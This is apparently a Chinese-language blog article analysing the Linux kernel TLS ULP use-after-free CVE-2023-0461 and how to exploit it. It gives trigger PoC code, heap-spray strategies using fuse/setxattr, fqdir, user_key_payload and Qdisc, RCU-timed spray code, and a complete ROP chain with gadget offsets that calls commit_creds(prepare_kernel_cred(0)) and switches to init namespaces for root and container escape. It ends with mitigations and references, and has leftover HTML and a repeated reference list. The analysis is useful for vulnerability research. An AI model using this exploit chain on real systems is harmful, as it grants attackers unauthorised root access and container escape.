Linux内核CVE-2023-0461 UAF漏洞分析与利用技术详解<\/h1>

漏洞概述<\/h2>
CVE-2023-0461是Linux内核中一个存在于TCP ULP(Upper Layer Protocol)处理机制中的Use-After-Free漏洞。该漏洞源于内核在处理`icsk->icsk_ulp_data<\/code>指针时存在错误，导致多个socket对象可以共享同一个ULP数据指针而不进行引用计数管理，从而在释放其中一个socket时产生悬垂指针。<\/p>`

漏洞技术分析<\/h2>
漏洞根源<\/h3>
漏洞的核心在于icsk->icsk_ulp_data<\/code>指针的拷贝和释放机制：<\/p>


指针分配<\/strong>：通过tcp_set_ulp<\/code> -> __tcp_set_ulp<\/code> -> tls_init<\/code> -> tls_ctx_create<\/code>路径分配ULP数据<\/p>
ctx =<\/span> kzalloc(sizeof<\/span>(*<\/span>ctx), GFP_ATOMIC);
<\/span><\/span>rcu_assign_pointer(icsk-><\/span>icsk_ulp_data, ctx);
<\/span><\/span><\/code><\/pre><\/li>

指针拷贝<\/strong>：当socket设置ULP后进入listen状态，其他socket通过connect请求连接时，新创建的sk对象会拷贝icsk->icsk_ulp_data<\/code>指针<\/p>
tcp_v4_syn_recv_sock
<\/span><\/span>  tcp_create_openreq_child
<\/span><\/span>    inet_csk_clone_lock
<\/span><\/span>      sk_clone_lock
<\/span><\/span>        newsk =<\/span> sk_prot_alloc(prot, priority, sk-><\/span>sk_family)
<\/span><\/span>        sock_copy(newsk, sk)
<\/span><\/span>          memcpy(&<\/span>nsk-><\/span>sk_dontcopy_end, &<\/span>osk-><\/span>sk_dontcopy_end, 
<\/span><\/span>                 prot-><\/span>obj_size -<\/span> offsetof(struct<\/span> sock, sk_dontcopy_end));
<\/span><\/span><\/code><\/pre><\/li>

结构关系<\/strong>：<\/p>

struct proto tcp_prot<\/code>定义了.obj_size = sizeof(struct tcp_sock)<\/code><\/li>
tcp_sock<\/code>包含inet_connection_sock<\/code>，后者包含icsk_ulp_data<\/code>指针<\/li>
通过memcpy<\/code>拷贝sk_dontcopy_end<\/code>后面的成员时会拷贝icsk->icsk_ulp_data<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
漏洞触发条件<\/h3>

创建一个socket并设置TCP ULP为"tls"<\/li>
使该socket进入listen状态<\/li>
另一个socket发起connect请求<\/li>
新创建的socket会拷贝原始socket的icsk_ulp_data<\/code>指针<\/li>
关闭其中一个socket会导致另一个socket持有悬垂指针<\/li>
<\/ol>
POC代码分析<\/h3>
int<\/span> tls_ctx_alloc<\/span>(int<\/span> port) {
<\/span><\/span>    struct<\/span> sockaddr_in addr;
<\/span><\/span>    socklen_t len =<\/span> sizeof<\/span>(addr);
<\/span><\/span>    int<\/span> tls, s;
<\/span><\/span>    
<\/span><\/span>    tls =<\/span> socket(AF_INET, SOCK_STREAM, 0<\/span>);
<\/span><\/span>    s =<\/span> socket(AF_INET, SOCK_STREAM, 0<\/span>);
<\/span><\/span>    
<\/span><\/span>    addr.sin_family =<\/span> AF_INET;
<\/span><\/span>    addr.sin_addr.s_addr =<\/span> INADDR_ANY;
<\/span><\/span>    addr.sin_port =<\/span> htons(port);
<\/span><\/span>    
<\/span><\/span>    bind(s, &<\/span>addr, sizeof<\/span>(addr));
<\/span><\/span>    listen(s, 0<\/span>);
<\/span><\/span>    connect(tls, &<\/span>addr, sizeof<\/span>(addr));
<\/span><\/span>    accept(s, &<\/span>addr, &<\/span>len);
<\/span><\/span>    
<\/span><\/span>    setsockopt(tls, SOL_TCP, TCP_ULP, "tls"<\/span>, sizeof<\/span>("tls"<\/span>));
<\/span><\/span>    return<\/span> tls;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> clone_ulp<\/span>(int<\/span> sk, int<\/span> port) {
<\/span><\/span>    struct<\/span> sockaddr_in addr;
<\/span><\/span>    socklen_t len =<\/span> sizeof<\/span>(addr);
<\/span><\/span>    int<\/span> s, new;
<\/span><\/span>    
<\/span><\/span>    s =<\/span> socket(AF_INET, SOCK_STREAM, 0<\/span>);
<\/span><\/span>    
<\/span><\/span>    addr.sin_family =<\/span> AF_UNSPEC;
<\/span><\/span>    addr.sin_addr.s_addr =<\/span> INADDR_ANY;
<\/span><\/span>    addr.sin_port =<\/span> htons(port);
<\/span><\/span>    connect(sk, &<\/span>addr, sizeof<\/span>(addr));
<\/span><\/span>    
<\/span><\/span>    addr.sin_family =<\/span> AF_INET;
<\/span><\/span>    bind(sk, &<\/span>addr, sizeof<\/span>(addr));
<\/span><\/span>    listen(sk, 0<\/span>);
<\/span><\/span>    connect(s, &<\/span>addr, sizeof<\/span>(addr));
<\/span><\/span>    new =<\/span> accept(sk, &<\/span>addr, &<\/span>len);
<\/span><\/span>    
<\/span><\/span>    return<\/span> new;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 使用示例
<\/span><\/span><\/span><\/span>tls1 =<\/span> tls_ctx_alloc(1111<\/span>);
<\/span><\/span>tls2 =<\/span> clone_ulp(tls1, 1112<\/span>);
<\/span><\/span><\/code><\/pre>执行后，tls1<\/code>和tls2<\/code>会指向同一个icsk_ulp_data<\/code>指针。<\/p>
漏洞利用技术<\/h2>
简单模式(仅启用kmalloc-cg)<\/h3>


利用思路<\/strong>：<\/p>

目标内核在kmalloc-cg-xxx<\/code>中分配GFP_KERNEL_ACCOUNT<\/code>标记的请求<\/li>
无法使用msg_msg<\/code>、sk_buff<\/code>等常用对象占位<\/li>
使用fuse + setxattr<\/code>方式占位<\/li>
<\/ul>
<\/li>

利用步骤<\/strong>：<\/p>

占位后利用setsockopt<\/code>往释放的tls_context<\/code>(占位后的xattr内存)写入函数指针<\/li>
fuse放行并读取xattr泄露内核基地址<\/li>
再次触发漏洞，修改tls_context<\/code>的函数指针实现ROP<\/li>
<\/ul>
<\/li>
<\/ol>
高级模式(启用CONFIG_KMALLOC_SPLIT_VARSIZE)<\/h3>


利用思路<\/strong>：<\/p>

将tls_context<\/code>的UAF转换为fqdir<\/code>的UAF<\/li>
利用fqdir<\/code>对象中的指针(fqdir->rhashtable.tbl<\/code>)实现dyn-kmalloc-1k<\/code>的UAF<\/li>
用user_key_payload<\/code>占位将kmalloc-512<\/code>的UAF转换为dyn-kmalloc-1024<\/code>的UAF<\/li>
用Qdisc<\/code>对象占位user_key_payload<\/code><\/li>
读取user_key_payload<\/code>泄露地址<\/li>
释放key后重新占位控制Qdisc<\/code>，劫持qdisc->enqueue<\/code>实现ROP<\/li>
<\/ul>
<\/li>

关键技巧<\/strong>：<\/p>

绕过RCU临界区检测：设置current->rcu_read_lock_nesting = 0<\/code><\/li>
绕过原子上下文检测：设置oops_in_progress = 1<\/code><\/li>
<\/ul>
<\/li>

完整ROP链示例<\/strong>：<\/p>
<\/li>
<\/ol>
rop =<\/span> (uint64_t<\/span> *<\/span>)&<\/span>data[0x88<\/span>];
<\/span><\/span>
<\/span><\/span>\/\/ oops_in_progress = 1 (Bypass schedule while atomic)
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> kbase +<\/span> 0xffffffff811481f3<\/span>; \/\/ pop rdi ; jmp 0xffffffff82404440 (retpoline)
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> 1<\/span>; \/\/ 1
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> kbase +<\/span> 0xffffffff810fb7dd<\/span>; \/\/ pop rsi ; ret
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> kbase +<\/span> 0xffffffff8419f478<\/span>; \/\/ oops_in_progress
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> kbase +<\/span> 0xffffffff81246359<\/span>; \/\/ mov qword ptr [rsi], rdi ; jmp 0xffffffff82404440 (retpoline)
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ creds = prepare_kernel_cred(0)
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> kbase +<\/span> 0xffffffff811481f3<\/span>; \/\/ pop rdi ; jmp 0xffffffff82404440 (retpoline)
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> 0<\/span>; \/\/ 0
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> kbase +<\/span> 0xffffffff811139d0<\/span>; \/\/ prepare_kernel_cred
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ commit_creds(creds)
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> kbase +<\/span> 0xffffffff811e3633<\/span>; \/\/ pop rcx ; ret
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> 0<\/span>; \/\/ 0
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> kbase +<\/span> 0xffffffff8204933b<\/span>; \/\/ mov rdi, rax ; rep movsq qword ptr [rdi], qword ptr [rsi] ; jmp 0xffffffff82404440 (retpoline)
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> kbase +<\/span> 0xffffffff811136f0<\/span>; \/\/ commit_creds
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ current = find_task_by_vpid(getpid())
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> kbase +<\/span> 0xffffffff811481f3<\/span>; \/\/ pop rdi ; jmp 0xffffffff82404440 (retpoline)
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> getpid(); \/\/ pid
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> kbase +<\/span> 0xffffffff8110a0d0<\/span>; \/\/ find_task_by_vpid
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ current += offsetof(struct task_struct, rcu_read_lock_nesting)
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> kbase +<\/span> 0xffffffff810fb7dd<\/span>; \/\/ pop rsi ; ret
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> 0x46c<\/span>; \/\/ offsetof(struct task_struct, rcu_read_lock_nesting)
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> kbase +<\/span> 0xffffffff8107befa<\/span>; \/\/ add rax, rsi ; jmp 0xffffffff82404440 (retpoline)
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> kbase +<\/span> 0xffffffff811e3633<\/span>; \/\/ pop rcx ; ret
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> 0<\/span>; \/\/ 0
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> kbase +<\/span> 0xffffffff8167104b<\/span>; \/\/ mov qword ptr [rax], rcx ; jmp 0xffffffff82404440 (retpoline)
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ task = find_task_by_vpid(1)
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> kbase +<\/span> 0xffffffff811481f3<\/span>; \/\/ pop rdi ; jmp 0xffffffff82404440 (retpoline)
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> 1<\/span>; \/\/ pid
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> kbase +<\/span> 0xffffffff8110a0d0<\/span>; \/\/ find_task_by_vpid
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ switch_task_namespaces(task, init_nsproxy)
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> kbase +<\/span> 0xffffffff811e3633<\/span>; \/\/ pop rcx ; ret
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> 0<\/span>; \/\/ 0
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> kbase +<\/span> 0xffffffff8204933b<\/span>; \/\/ mov rdi, rax ; rep movsq qword ptr [rdi], qword ptr [rsi] ; jmp 0xffffffff82404440 (retpoline)
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> kbase +<\/span> 0xffffffff810fb7dd<\/span>; \/\/ pop rsi ; ret
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> kbase +<\/span> 0xffffffff83661680<\/span>; \/\/ init_nsproxy (from parse_mount_options)
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> kbase +<\/span> 0xffffffff81111c80<\/span>; \/\/ switch_task_namespaces
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ Back to userspace
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> kbase +<\/span> 0xffffffff822010c6<\/span>; \/\/ swapgs_restore_regs_and_return_to_usermode + 54
<\/span><\/span><\/span><\/span>rop[idx++<\/span>] =<\/span> 0<\/span>;
<\/span><\/span>rop[idx++<\/span>] =<\/span> 0<\/span>;
<\/span><\/span>rop[idx++<\/span>] =<\/span> (uint64_t<\/span>)&<\/span>getroot;
<\/span><\/span>rop[idx++<\/span>] =<\/span> usr_cs;
<\/span><\/span>rop[idx++<\/span>] =<\/span> usr_rflags;
<\/span><\/span>rop[idx++<\/span>] =<\/span> (uint64_t<\/span>)(stack +<\/span> 0x80000<\/span>);
<\/span><\/span>rop[idx++<\/span>] =<\/span> usr_ss;
<\/span><\/span><\/code><\/pre>漏洞挖掘方法论<\/h2>


关注对象中的指针域<\/strong>：<\/p>

特别关注那些没有引用计数且会发生指针拷贝的指针域<\/li>
这些指针在删除时如果清理不当容易导致UAF<\/li>
<\/ul>
<\/li>

分析指针使用点<\/strong>：<\/p>

寻找指针拷贝和指针释放的位置<\/li>
该漏洞的指针拷贝点隐藏在sk_clone_lock<\/code>中<\/li>
<\/ul>
<\/li>

检查指针释放后的处理<\/strong>：<\/p>

指针释放后，其他对象中的相同指针是否被清空<\/li>
如果没有清空就会导致UAF<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用通用思路<\/h2>


对象转换技巧<\/strong>：<\/p>

将漏洞对象转换为数据对象(xattr、user_key_payload等)<\/li>
用有指针的重叠对象占位数据对象<\/li>
实现将内核地址写入数据对象<\/li>
读取数据对象泄露地址<\/li>
再次释放和分配数据对象，控制重叠对象中的指针<\/li>
<\/ul>
<\/li>

间接UAF利用<\/strong>：<\/p>

通过将tls_context<\/code>的UAF转换为fqdir<\/code>对象的UAF<\/li>
利用两个指向fqdir<\/code>的指针，实现fqdir->rhashtable.tbl<\/code>对象的间接UAF<\/li>
这种技术扩展了利用选择(从kmalloc-512<\/code>到dyn-kmalloc<\/code>)<\/li>
<\/ul>
<\/li>

RCU宽限期利用<\/strong>：<\/p>
\/\/ Step 1.0 - Close the first socket
<\/span><\/span><\/span>\/\/ icsk_ulp_data (tls_context) is freed but still accessible from the second socket
<\/span><\/span><\/span><\/span>close(tls1);
<\/span><\/span>
<\/span><\/span>\/\/ Wait for the RCU grace period:
<\/span><\/span><\/span>\/\/ usually sleep(1) is enough, but for tls_context sometimes it takes longer
<\/span><\/span><\/span><\/span>waitfor(6<\/span>, "Freeing ctx"<\/span>);
<\/span><\/span>
<\/span><\/span>\/\/ Step 1.1 - Close the second socket and before the icsk_ulp_data pointer (tls_context)
<\/span><\/span><\/span>\/\/ is freed again (during the RCU grace period) replace it with a fqdir object
<\/span><\/span><\/span><\/span>close(tls2);
<\/span><\/span>for<\/span>(int<\/span> i =<\/span> 0<\/span>; i <<\/span> N_SPRAY_1; i++<\/span>)
<\/span><\/span>    task_set_state(t1[i], TASK_SPRAY_FQDIR);
<\/span><\/span><\/code><\/pre>
close(tls1)<\/code>后，tls2<\/code>引用的是已释放的tls_context<\/code><\/li>
close(tls2)<\/code>后会把已释放的sk放到RCU链表<\/li>
通知堆喷线程开始分配fqdir<\/code>占位已释放的tls_context<\/code><\/li>
RCU宽限期到达，释放sk时会释放fqdir<\/code>，从而将漏洞转换为fqdir<\/code>的UAF<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>

对icsk->icsk_ulp_data<\/code>指针添加引用计数管理<\/li>
在sk_clone_lock<\/code>中复制ULP数据时进行深拷贝而非指针拷贝<\/li>
及时更新内核到修复版本<\/li>
启用内核防护机制如KASAN、KASLR等<\/li>
<\/ol>
参考链接<\/h2>

Linux Kernel Exploit: tls_context UAF<\/a><\/li>
Google Security Research Exploit<\/a><\/li>
<\/ol>
Linux内核CVE-2023-0461 UAF漏洞分析与利用技术详解<\/h1>

参考链接<\/h2> Linux Kernel Exploit: tls_context UAF<\/a><\/li> Google Security Research Exploit<\/a><\/li> <\/ol>

参考链接<\/h2>

Linux Kernel Exploit: tls_context UAF<\/a><\/li>
Google Security Research Exploit<\/a><\/li> <\/ol>
